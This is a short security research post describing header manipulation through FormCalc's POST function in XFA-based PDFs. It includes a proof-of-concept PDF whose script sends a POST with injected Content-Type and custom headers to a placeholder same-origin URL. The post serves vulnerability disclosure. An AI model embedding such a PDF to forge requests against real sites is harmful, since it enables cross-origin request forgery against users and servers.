PDF - Mess with the web
In this post I am going to talk about the vulnerabilities I found during the research for my AppSec Talk in Amsterdam.
Formcalc and header manipulationI already wrote about the capability of formcalc to read same origin files.
The formcalc language offers another feature, which is quite powerful.
The POST function has five parameters, the last one lets you specify any http headers you want. You can set ANY header you want (besides the USER-Agent) and they replace the header a browser would send normally like a different Host header, Content-Type, Content-Length, Referer etc.
Note: You can use this so send specially crafted requests cross origin, as long as you don't care about the response. When a POST with custom headers is sent same origin but the response is a 307 temp. redirect, Acrobat Reader will follow the redirect, preserve the headers and send the request but you won't be able to read the response.
% a PDF file using an XFA % most whitespace can be removed (truncated to 570 bytes or so...) % Ange Albertini BSD Licence 2012 % a little bit modified to show possible header injection via formcalc %PDF-1. % can be truncated to %PDF-\0 1 0 obj <<>> stream <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <config><present><pdf> <interactive>1</interactive> </pdf></present></config> <template> <subform name="_"> <pageSet/> <field id="Hello World!"> <event activity="initialize"> <script contentType='application/x-formcalc'> Post("http://sameOrigin.com/index.html","YOUR POST DATA","text/plain","utf-8","Content-Type: Dolphin
Test: AAA") </script> </event> </field> </subform> </template> </xdp:xdp> endstream endobj trailer << /Root << /AcroForm << /Fields [<< /T (0) /Kids [<< /Subtype /Widget /Rect  /T () /FT /Btn >>] >>] /XFA 1 0 R >> /Pages <<>> >> >>